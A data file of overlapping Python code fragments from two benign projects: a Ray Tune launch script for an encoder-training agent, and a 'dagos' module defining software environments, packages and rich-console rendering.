"ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2 ** 30) reporter = CLIReporter(",
"analysis = tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result: result['epoch'] > cfg.epochs, checkpoint_at_end=True,",
"args = parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20 * 2 ** 30, object_store_memory=80 *",
"metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] ) analysis = tune.run( Trainer, name='nips_encoder_tune', verbose=1,",
"CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] ) analysis = tune.run( Trainer, name='nips_encoder_tune',",
"from ray.tune import CLIReporter from agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer import Trainer, Config",
"\"adam_lr\", \"time_remain\", \"time_past\"] ) analysis = tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result:",
"tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result: result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size",
"agent0.nips_encoder.trainer import Trainer, Config if __name__ == '__main__': repo = git.Repo(search_parent_directories=True) sha =",
"repo = git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha cfg = Config(sha=sha_long)",
"\"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] ) analysis = tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id,",
"= repo.head.object.hexsha cfg = Config(sha=sha_long) args = parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20 *",
"import Trainer, Config if __name__ == '__main__': repo = git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha,",
"ray from ray import tune from ray.tune import CLIReporter from agent0.common.utils import parse_arguments",
"short=True) sha_long = repo.head.object.hexsha cfg = Config(sha=sha_long) args = parse_arguments(cfg) cfg = Config(**vars(args))",
"sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha cfg = Config(sha=sha_long) args = parse_arguments(cfg)",
"= tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result: result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter,",
"reporter = CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] ) analysis = tune.run(",
"= parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2",
"__name__ == '__main__': repo = git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha",
"Config if __name__ == '__main__': repo = git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long",
"= git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha cfg = Config(sha=sha_long) args",
"import parse_arguments from agent0.nips_encoder.trainer import Trainer, Config if __name__ == '__main__': repo =",
"import tune from ray.tune import CLIReporter from agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer import",
"= Config(**vars(args)) ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2 ** 30) reporter",
"cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size // cfg.batch_size, resources_per_trial={\"gpu\": 1}, config=vars(cfg), fail_fast=True, reuse_actors=True, restore=cfg.restore_checkpoint, )",
"= Config(sha=sha_long) args = parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20 * 2 ** 30,",
"tune from ray.tune import CLIReporter from agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer import Trainer,"
] |
[
"@classmethod def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name",
"component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components) > 0: logger.error( \"{} of the {}",
"Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images: package_tree = Tree(\"packages\") for",
"package_tree = Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield",
"component.software_component: logger.trace(\"Requested component '{}' is known!\", component.name) # TODO: Check if selected platform",
"for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any, **kwds:",
"= name self.description = description self.platform = platform self.components = components def collect_components(self)",
"images: t.List[Image] def __rich_console__( self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table",
"class Image: id: str packages: t.List[Packages] @dataclass class Component: name: str purpose: t.Optional[str]",
"self.name = name self.description = description self.platform = platform self.components = components def",
"if environment.name == name: return environment return None @dataclass class Platform: env: t.List[EnvironmentVariable]",
"@dataclass class Component: name: str purpose: t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry):",
"-> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software",
"-> None: \"\"\"\"\"\" self.path = path self.name = name self.description = description self.platform",
"0: logger.error( \"{} of the {} requested components are unknown, specifically: {}\", len(unknown_components),",
"import Path from loguru import logger from rich.console import Console from rich.console import",
"EnvironmentVariable: name: str value: str @dataclass class Packages: package_list: t.List[str] manager: str =",
"if len(unknown_components) > 0: logger.error( \"{} of the {} requested components are unknown,",
"= Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table",
"name self.description = description self.platform = platform self.components = components def collect_components(self) ->",
"import Console from rich.console import ConsoleOptions from rich.console import Group from rich.console import",
"None @dataclass class Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def __rich_console__( self,",
"Platform, components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path = path self.name = name",
"class Component: name: str purpose: t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base",
"cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for environment",
"justify=\"center\") for component in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component else",
"yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True,",
"self.images: package_tree = Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table)",
"str description: t.Optional[str] platform: Platform components: t.List[Component] def __init__( self, path: Path, name:",
"image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable: name: str value: str",
"import RenderResult from rich.markdown import Markdown from rich.panel import Panel from rich.table import",
"t.Any: \"\"\"The registry hooks into the object construction lifecycle to register software environments.",
"Path from loguru import logger from rich.console import Console from rich.console import ConsoleOptions",
"SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path name: str description: t.Optional[str] platform:",
"options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common",
"environment @classmethod def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if",
"title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\",",
"common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in",
"in self.images: package_tree = Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table,",
"( self.manager if self.dependency is None else f\"{self.manager} ({self.dependency})\" ) tree = Tree(title)",
"Group from rich.console import group from rich.console import RenderResult from rich.markdown import Markdown",
"str purpose: t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software",
"t.List[Packages] @dataclass class Component: name: str purpose: t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class",
"Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table",
"dependency: t.Optional[str] = None def __rich__(self) -> Tree: title = ( self.manager if",
"\"system\" dependency: t.Optional[str] = None def __rich__(self) -> Tree: title = ( self.manager",
"SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] =",
"Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\")",
"t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree",
"are unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return collected_components def __rich__(self)",
"\"{} of the {} requested components are unknown, specifically: {}\", len(unknown_components), len(self.components), \",",
"rich.panel import Panel from rich.table import Table from rich.tree import Tree from dagos.core.components",
"to register software environments. \"\"\" environment = super().__call__(*args, **kwds) if cls not in",
"Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software",
"self.manager if self.dependency is None else f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for",
"str, description: t.Optional[str], platform: Platform, components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path =",
"unknown_components.append(component.name) if len(unknown_components) > 0: logger.error( \"{} of the {} requested components are",
"t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry",
"collected_components def __rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table",
"self.path = path self.name = name self.description = description self.platform = platform self.components",
") -> None: \"\"\"\"\"\" self.path = path self.name = name self.description = description",
"justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row( component.name, component.purpose, component.version,",
"Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for",
"as t from dataclasses import dataclass from pathlib import Path from loguru import",
"import typing as t from dataclasses import dataclass from pathlib import Path from",
"parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages",
"group from rich.console import RenderResult from rich.markdown import Markdown from rich.panel import Panel",
"for image in self.images: package_tree = Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id,",
"RenderResult from rich.markdown import Markdown from rich.panel import Panel from rich.table import Table",
"'{}' is known!\", component.name) # TODO: Check if selected platform supports component? collected_components.append(component.software_component)",
"else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()), title=f\"Environment: {self.name}\", title_align=\"left\", subtitle=f\"Path: {self.path}\",",
"\", \".join(unknown_components), ) return collected_components def __rich__(self) -> Panel: @group() def get_renderables(): yield",
"table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1)",
"packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable:",
"Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\")",
"common_package_tree = Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container",
"__init__( self, path: Path, name: str, description: t.Optional[str], platform: Platform, components: t.List[Component], )",
"Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images: package_tree = Tree(\"packages\") for packages",
"component in self.components: if component.software_component: logger.trace(\"Requested component '{}' is known!\", component.name) # TODO:",
"in cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for",
"title = ( self.manager if self.dependency is None else f\"{self.manager} ({self.dependency})\" ) tree",
"t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path:",
"**kwds) if cls not in cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls, name:",
"image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable: name: str",
"({self.dependency})\" ) tree = Tree(title) for package in self.package_list: tree.add(package) return tree @dataclass",
"@dataclass class Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def __rich_console__( self, console:",
"self, path: Path, name: str, description: t.Optional[str], platform: Platform, components: t.List[Component], ) ->",
"= \"system\" dependency: t.Optional[str] = None def __rich__(self) -> Tree: title = (",
"ConsoleOptions from rich.console import Group from rich.console import group from rich.console import RenderResult",
"Console from rich.console import ConsoleOptions from rich.console import Group from rich.console import group",
"hooks into the object construction lifecycle to register software environments. \"\"\" environment =",
"table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else",
"environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any:",
"known!\", component.name) # TODO: Check if selected platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name)",
"({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\",",
"Markdown from rich.panel import Panel from rich.table import Table from rich.tree import Tree",
"[] for component in self.components: if component.software_component: logger.trace(\"Requested component '{}' is known!\", component.name)",
"cls not in cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls, name: str) ->",
"ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\",",
"self.dependency is None else f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for package in",
"component.purpose, component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", )",
"dataclasses import dataclass from pathlib import Path from loguru import logger from rich.console",
"env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def __rich_console__( self, console: Console, options: ConsoleOptions",
"show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table =",
"self.package_list: tree.add(package) return tree @dataclass class Image: id: str packages: t.List[Packages] @dataclass class",
"import group from rich.console import RenderResult from rich.markdown import Markdown from rich.panel import",
"t.List[SoftwareComponent] = [] unknown_components: t.List[str] = [] for component in self.components: if component.software_component:",
"path: Path, name: str, description: t.Optional[str], platform: Platform, components: t.List[Component], ) -> None:",
"__call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry hooks into the object",
"package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str] = None def __rich__(self) ->",
"cls.environments: if environment.name == name: return environment return None @dataclass class Platform: env:",
"import Table from rich.tree import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A",
"path: Path name: str description: t.Optional[str] platform: Platform components: t.List[Component] def __init__( self,",
"t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def __rich_console__( self, console: Console, options: ConsoleOptions )",
"from rich.panel import Panel from rich.table import Table from rich.tree import Tree from",
"return None @dataclass class Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def __rich_console__(",
"from dataclasses import dataclass from pathlib import Path from loguru import logger from",
"\"\"\"The registry hooks into the object construction lifecycle to register software environments. \"\"\"",
"software environments.\"\"\" path: Path name: str description: t.Optional[str] platform: Platform components: t.List[Component] def",
"table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components:",
"is None else f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for package in self.package_list:",
"> 0: logger.error( \"{} of the {} requested components are unknown, specifically: {}\",",
"Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images: package_tree = Tree(\"packages\")",
"import Panel from rich.table import Table from rich.tree import Tree from dagos.core.components import",
"of the {} requested components are unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components),",
"name: str value: str @dataclass class Packages: package_list: t.List[str] manager: str = \"system\"",
"collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = [] for component",
"in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for",
"t.Optional[str], platform: Platform, components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path = path self.name",
"name: str) -> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name == name: return",
"environments. \"\"\" environment = super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment) return",
"tree = Tree(title) for package in self.package_list: tree.add(package) return tree @dataclass class Image:",
"Path name: str description: t.Optional[str] platform: Platform components: t.List[Component] def __init__( self, path:",
"console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table",
"description self.platform = platform self.components = components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent]",
"component.name) # TODO: Check if selected platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if",
"if selected platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components) > 0: logger.error(",
"\"\"\"\"\"\" self.path = path self.name = name self.description = description self.platform = platform",
"if component.software_component: logger.trace(\"Requested component '{}' is known!\", component.name) # TODO: Check if selected",
"if cls not in cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls, name: str)",
"import Group from rich.console import group from rich.console import RenderResult from rich.markdown import",
"if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table return",
"name: str, description: t.Optional[str], platform: Platform, components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path",
"Image: id: str packages: t.List[Packages] @dataclass class Component: name: str purpose: t.Optional[str] version:",
"supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components) > 0: logger.error( \"{} of the",
"component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()), title=f\"Environment: {self.name}\", title_align=\"left\", subtitle=f\"Path:",
"packages: t.List[Packages] @dataclass class Component: name: str purpose: t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent]",
"t.Any) -> t.Any: \"\"\"The registry hooks into the object construction lifecycle to register",
"from pathlib import Path from loguru import logger from rich.console import Console from",
"= components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] =",
"environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The",
"logger.error( \"{} of the {} requested components are unknown, specifically: {}\", len(unknown_components), len(self.components),",
"Check if selected platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components) > 0:",
"title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\")",
"packages: t.List[Packages] images: t.List[Image] def __rich_console__( self, console: Console, options: ConsoleOptions ) ->",
"\":cross_mark:\", ) yield table return Panel( Group(get_renderables()), title=f\"Environment: {self.name}\", title_align=\"left\", subtitle=f\"Path: {self.path}\", subtitle_align=\"right\",",
"rich.console import group from rich.console import RenderResult from rich.markdown import Markdown from rich.panel",
"platform: Platform components: t.List[Component] def __init__( self, path: Path, name: str, description: t.Optional[str],",
"show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for",
"TODO: Check if selected platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components) >",
"Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\")",
"rich.console import RenderResult from rich.markdown import Markdown from rich.panel import Panel from rich.table",
"self.platform = platform self.components = components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] =",
"in self.components: if component.software_component: logger.trace(\"Requested component '{}' is known!\", component.name) # TODO: Check",
"expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component",
"= platform self.components = components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = []",
"class Packages: package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str] = None def",
"name: return environment return None @dataclass class Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images:",
"from loguru import logger from rich.console import Console from rich.console import ConsoleOptions from",
"environment = super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment) return environment @classmethod",
"def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name ==",
"t.List[str] = [] for component in self.components: if component.software_component: logger.trace(\"Requested component '{}' is",
"None else f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for package in self.package_list: tree.add(package)",
"from rich.tree import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible",
"-> t.Any: \"\"\"The registry hooks into the object construction lifecycle to register software",
"into the object construction lifecycle to register software environments. \"\"\" environment = super().__call__(*args,",
"logger from rich.console import Console from rich.console import ConsoleOptions from rich.console import Group",
"rich.console import ConsoleOptions from rich.console import Group from rich.console import group from rich.console",
"environment return None @dataclass class Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def",
"name: str purpose: t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for",
"[] unknown_components: t.List[str] = [] for component in self.components: if component.software_component: logger.trace(\"Requested component",
"table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component",
"requested components are unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return collected_components",
"parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in",
"class EnvironmentVariable: name: str value: str @dataclass class Packages: package_list: t.List[str] manager: str",
"else f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for package in self.package_list: tree.add(package) return",
"component in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\"",
"metaclass responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args:",
"= Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images: package_tree =",
"= ( self.manager if self.dependency is None else f\"{self.manager} ({self.dependency})\" ) tree =",
"tree.add(package) return tree @dataclass class Image: id: str packages: t.List[Packages] @dataclass class Component:",
"path self.name = name self.description = description self.platform = platform self.components = components",
"\"\"\"A metaclass responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls,",
"**kwds: t.Any) -> t.Any: \"\"\"The registry hooks into the object construction lifecycle to",
"Component: name: str purpose: t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class",
"= Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images",
"t.List[Image] def __rich_console__( self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table =",
"@dataclass class EnvironmentVariable: name: str value: str @dataclass class Packages: package_list: t.List[str] manager:",
"import annotations import typing as t from dataclasses import dataclass from pathlib import",
"def __rich__(self) -> Tree: title = ( self.manager if self.dependency is None else",
"version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path",
"table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\"",
"\".join(unknown_components), ) return collected_components def __rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\")",
"= description self.platform = platform self.components = components def collect_components(self) -> t.List[SoftwareComponent]: collected_components:",
"parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree =",
"image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images: package_tree = Tree(\"packages\") for packages in image.packages:",
"value: str @dataclass class Packages: package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str]",
"software environments. \"\"\" environment = super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment)",
"return environment return None @dataclass class Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image]",
"platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components) > 0: logger.error( \"{} of",
"package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable: name: str value: str @dataclass",
"Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree)",
"id: str packages: t.List[Packages] @dataclass class Component: name: str purpose: t.Optional[str] version: t.Optional[str]",
"t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry hooks into the object construction lifecycle",
"@dataclass class Image: id: str packages: t.List[Packages] @dataclass class Component: name: str purpose:",
"str) -> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name == name: return environment",
"len(unknown_components), len(self.components), \", \".join(unknown_components), ) return collected_components def __rich__(self) -> Panel: @group() def",
"import Markdown from rich.panel import Panel from rich.table import Table from rich.tree import",
"common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images:",
"description: t.Optional[str] platform: Platform components: t.List[Component] def __init__( self, path: Path, name: str,",
"component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\",",
"SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def",
"rich.markdown import Markdown from rich.panel import Panel from rich.table import Table from rich.tree",
"environment in cls.environments: if environment.name == name: return environment return None @dataclass class",
"the object construction lifecycle to register software environments. \"\"\" environment = super().__call__(*args, **kwds)",
"for environment in cls.environments: if environment.name == name: return environment return None @dataclass",
"environments.\"\"\" path: Path name: str description: t.Optional[str] platform: Platform components: t.List[Component] def __init__(",
"-> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = [] for component in",
"table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row( component.name, component.purpose,",
"from rich.console import group from rich.console import RenderResult from rich.markdown import Markdown from",
"for component in self.components: if component.software_component: logger.trace(\"Requested component '{}' is known!\", component.name) #",
